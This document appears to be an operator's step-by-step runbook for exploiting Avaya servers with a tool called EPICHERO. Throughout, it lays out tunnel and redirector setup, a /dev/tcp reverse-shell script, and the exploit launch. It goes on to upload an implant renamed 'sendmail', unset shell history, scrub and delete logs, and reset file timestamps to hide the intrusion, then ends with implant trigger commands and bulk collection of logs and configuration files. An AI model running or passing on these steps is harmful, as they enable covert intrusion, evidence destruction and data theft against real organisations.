user.tool.epichero.COMMON
# 2010-08-16 22:35:31 EDT
############################ EPICHERO
mx
:%s/WINDOWS_OPS_STATION_IP/192.168.254.72/g
:%s/LINUX_OPS_STATION_IP/192.168.254.71/g
:%s/LOCAL_REDIRECTOR_IP/192.168.254.72/g
:%s/REMOTE_REDIRECTOR_IP/10.X.0.51/g
:%s/REVERSE_SHELL_CALLBACK_PORT/5060/g
:%s/NOPEN_LISTEN_PORT/5424/g
:%s/ISH_CALLBACK_PORT/5061/g
:%s/TARGET_IP/10.X.0.19/g
:%s/TRIGGER_BOX_IP/192.168.0.1/g
:%s#PATH_TO_EH_DIR#/current/down/epic/#g
:%s#WORKING_DIRECTORY#/root/.history/#g
:%s/NOPEN_NAME/sendmail/g
'x
#
# First, set up your tunnels. There is a specific list of ports you should use
# because of the default firewall setup on the Avaya servers; confirm these
# settings after you gain access.
#
# PORTS TO USE (IN AND OUT) -- confirm with `iptables -n -L` once you are on target
#
# 5060 5061 1719 5424 21874
#
cat << "EOF" | unix2dos | nc -vvv -l -p 33333
monitor redirect -tcp -nodes 40 -lplisten RHP_CB_FOR_10.X.0.51 -target 127.0.0.1 1509
monitor packetredirect -packeeettype icmp -listenport 2222
monitor redirect -tcp -nodes 40 -lplisten 443 -target TARGET_IP 443
monitor redirect -tcp -nodes 40 -implantlisten REVERSE_SHELL_CALLBACK_PORT -target LINUX_OPS_STATION_IP REVERSE_SHELL_CALLBACK_PORT
monitor redirect -tcp -nodes 40 -lplisten NOPEN_LISTEN_PORT -target TARGET_IP NOPEN_LISTEN_PORT
EOF
#
# On the windows box, run "telnet LINUX_OPS_STATION_IP 33333" to get your pastables
#
#
# If you are throwing from a *Nix box (like when exploiting the second server)
#
-tunnel
l 443 TARGET_IP 443
r REVERSE_SHELL_CALLBACK_PORT
l NOPEN_LISTEN_PORT TARGET_IP NOPEN_LISTEN_PORT
s
#
# cd into the EPICHERO directory, check usage and run a survey command
#
cd PATH_TO_EH_DIR
./eh
./eh -v -i LOCAL_REDIRECTOR_IP
ls -lart
cat log
#
# You are looking for the scanned version and patch number to confirm the system
# is vulnerable. Check with the developer, but you are safe if the version is 3.0.0.
# SCAN: version=S8710-013-00.0.340.3
# ^ ^ ^
# | | Dot release
# | Minor Version number
# Major Version Number
#
#
# If everything looks good, set up your reverse shell command, and make sure it
# copied over correctly.
#
cd PATH_TO_EH_DIR
cat << EOF > reverse.shell.script
sh >/dev/tcp/REMOTE_REDIRECTOR_IP/REVERSE_SHELL_CALLBACK_PORT <&1 2>&1
EOF
ls -lart ; cat reverse.shell.script
cp /current/up/noserver-linux NOPEN_NAME
gzip NOPEN_NAME
uuencode NOPEN_NAME.gz NOPEN_NAME.gz > NOPEN_NAME.gz.uu
gedit NOPEN_NAME.gz.uu &
#
# OK, confirm your tunnels are good to go and throw the exploit. /tmp is
# usually not executable (check the `mount` output), so you must find another
# working directory.
#
nc -vvv -l -p REVERSE_SHELL_CALLBACK_PORT
./eh -e -r -s reverse.shell.script -i LOCAL_REDIRECTOR_IP
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
date; date -u
mount
ls -lart /root
ls -al /root/.history
ls -alc /root/.history
ls -lau /root/.history
cd /root/.history
pwd
type uudecode gunzip
uudecode; ls -lart
gunzip NOPEN_NAME.gz
chmod 700 NOPEN_NAME
PATH=. D=-lNOPEN_LISTEN_PORT NOPEN_NAME
#
# Now that you have nopen up (hopefully), check tripwire
#
-vget /etc/tripwire/twenable.txt
#
# Save these off, peruse them later after cleanup
#
iptables -L -n -v > T:/current/down/iptables-Lnv.TARGET_IP
#
# Go through your normal cleaning process, check logs, process accounting, etc.
# You will need to clean (at least)
#
#
# /var/log/httpd/error_log
# /var/log/ecs/commandhistory
# /var/log/ecs/update.log
# /var/log/secure
# /var/log/messages
# /var/iglut/upg_status.dat
# /tftpboot
-logs /var/iglut /tftpboot /var/log/httpd/ /var/log/ecs/
#
# The error log is messy; it captures the nitty-gritty details of our exploit, so
# be sure to scrub it thoroughly. The best approach is probably to look for
# obvious entries from us and use that timestamp (down to a minute or two) to
# remove everything from that window.
#
-ls /var/log/httpd/error_log
-tail -100 /var/log/httpd/error_log
egrep "YOUR_TIMESTAMP" /var/log/httpd/error_log
-gs grepout -w /root/.history "YOUR_TIMESTAMP" /var/log/httpd/error_log
touch -t GOOD_TIME_STAMP /var/log/httpd/error_log
#
# The best thing to grep for in the next two files is probably the same
# timestamp as above, i.e. the time at which you exploited.
#
-ls /var/log/ecs/commandhistory
-get /var/log/ecs/commandhistory
-tail -50 /var/log/ecs/commandhistory
egrep "YOUR STUFF" /var/log/ecs/commandhistory
-gs grepout -w /root/.history "YOUR STUFF" /var/log/ecs/commandhistory
touch -t GOOD_TIME_STAMP /var/log/ecs/commandhistory
#
#
#
-ls /var/log/ecs/update.log
-tail -50 /var/log/ecs/update.log
egrep "YOUR STUFF" /var/log/ecs/update.log
-gs grepout -w /root/.history "YOUR STUFF" /var/log/ecs/update.log
touch -t GOOD_TIME_STAMP /var/log/ecs/update.log
#
# The best thing to grep for in the secure log is a combination of your
# timestamp and sudo
#
-ls /var/log/secure
-tail -50 /var/log/secure
egrep "^YOUR_TIMESTAMP.*sudo" /var/log/secure
-gs grepout -w /root/.history "^YOUR_TIMESTAMP.*sudo" /var/log/secure
#
# Probably won't need to touch back times
#
#
# The best thing to grep for in /var/log/messages is a combination of your
# timestamp and update_show
#
-ls /var/log/messages
-tail -50 /var/log/messages
egrep "^YOUR_TIMESTAMP.*update_show" /var/log/messages
-gs grepout -w /root/.history "^YOUR_TIMESTAMP.*update_show" /var/log/messages
#
# Probably no need to touch back times
#
#
# It is possible that we are the only thing in /var/log/httpd/ssl_requests.log;
# if so, clear the file. Otherwise grep out our entries. The timestamp format
# is different, but you can still use the same time.
#
-ls /var/log/httpd/ssl_requests.log
-tail -50 /var/log/httpd/ssl_requests.log
egrep "YOUR_TIMESTAMP_DIFFERENT_FORMAT" /var/log/httpd/ssl_requests.log
-gs grepout -w /root/.history "YOUR_TIMESTAMP_DIFFERENT_FORMAT" /var/log/httpd/ssl_requests.log
# OR
cat /dev/null > /var/log/httpd/ssl_requests.log
#
# use your judgement to touch this file back to a good time
#
#
# According to the devs, we are looking for status=66 in this file; if we are the only thing in it, remove the file.
#
-ls /var/iglut/upg_status.dat
-vget /var/iglut/upg_status.dat
egrep "status=66|Upgrade failed. Unable to transfer the license file to the target unit being upgraded." /var/iglut/upg_status.dat
egrep -v "status=66|Upgrade failed. Unable to transfer the license file to the target unit being upgraded." /var/iglut/upg_status.dat
-gs grepout -w /root/.history "status=66|Upgrade failed. Unable to transfer the license file to the target unit being upgraded." /var/iglut/upg_status.dat
# OR
-rm /var/iglut/upg_status.dat
#
# And probably touch this directory back to the time of the parent directory
#
-touch /var/iglut/.. /var/iglut/.
#
# The exploit does save some timestamps for you that you can touch back; these
# are noted in the log file. On your Linux ops box, enter:
#
cat PATH_TO_EH_DIRlog
egrep TIMES PATH_TO_EH_DIRlog
mc
:%s#FILE_HOLDING_OPT_TIMES#OPT_TIMES#g
:%s#FILE_HOLDING_TFTPBOOT_TIMES#TFTPBOOT_TIMES#g
:%s#FILE_HOLDING_OPT_WS_TIMES#OPT_WS_TIMES#g
'c
#
# Go ahead and use the timestamps it saved for you to touch some directories back.
#
touch -r FILE_HOLDING_OPT_WS_TIMES `ls -l /opt/ws | cut -d '>' -f2`
touch -r FILE_HOLDING_OPT_TIMES /opt
touch -r FILE_HOLDING_TFTPBOOT_TIMES /tftpboot
#
# If you are good to implant, know that SAFFRONYELLOW combined with DEWDROP
# causes `date` to never return. The install will (should probably) be
# successful, but you WILL LOSE the window you installed from!!!!
# Be prepared.
#
#
# Once you implant, you will probably need a trigger like this:
#
mx
:%s#HIDDEN_DIR#/lib/.b625a59f5f2a26de#g
`x
#
# Be sure you have your tunnels set up for the trigger if you are triggering
# through Windows
#
cat << "EOF" | unix2dos | nc -l -p 5555
monitor redirect -tcp -nodes 40 -target LINUX_OPS_STATION_IP ISH_CALLBACK_PORT -implantlisten ISH_CALLBACK_PORT
monitor redirect -tcp -nodes 40 -target TARGET_IP REVERSE_SHELL_CALLBACK_PORT -lplisten REVERSE_SHELL_CALLBACK_PORT
monitor packetredirect -packettype udp -listenport 2222 -bind WINDOWS_OPS_STATION_IP
EOF
#
# Once again, on windows "telnet LINUX_OPS_STATION_IP 5555"
#
ourtn -eY5U /current/up/noserver-linux -O REVERSE_SHELL_CALLBACK_PORT -p ISH_CALLBACK_PORT -i TRIGGER_BOX_IP -W WINDOWS_OPS_STATION_IP:2222 -w HIDDEN_DIR TARGET_IP
#
# And if you are attacking from a *Nix box
#
-irtun TARGET_IP ISH_CALLBACK_PORT -eY5U /current/up/noserver-linux -O REVERSE_SHELL_CALLBACK_PORT -w HIDDEN_DIR
#
# now there is some collection the developers need
#
-get /var/log/secure*
-get /var/log/messages*
-get /var/log/httpd/access_log*
-get /var/log/httpd/ssl_request*
-get /var/log/ecs/commandhistory.*
-get /var/log/httpd/error_log*
#
# Get the last 2 or 3 of these
#
ls -lart /var/log/ecs/ | tail -5
#
# Get this file too
#
-lsh egrep "wlog$" /current/*timem
-get /etc/opt/defty/xln1
du -sh /etc/opt/ecs
-get /etc/opt/ecs
-get /etc/sysconfig/network-scripts
-get /opt/ecssw*/tripwire.conf
#
# Now, if after all this you have time, go exploit the second guy!
#